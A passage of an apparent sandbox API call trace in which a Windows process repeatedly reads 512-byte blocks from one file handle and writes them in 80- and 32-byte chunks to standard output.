lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.007] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.007] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.008] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.008] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, 
lpOverlapped=0x0) returned 1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.010] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.010] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] WriteFile (in: hFile=0x50, 
lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] GetFileType (hFile=0x50) returned 0x1 [0195.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.010] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.011] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.011] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 
[0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.011] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.012] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.012] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: 
lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.012] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.013] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.013] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] GetFileType (hFile=0x50) returned 0x1 [0195.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.013] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 
[0195.014] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.014] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.014] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 
[0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] GetFileType (hFile=0x50) returned 0x1 [0195.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.014] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] GetFileType (hFile=0x50) returned 0x1 [0195.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.015] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.015] _get_osfhandle 
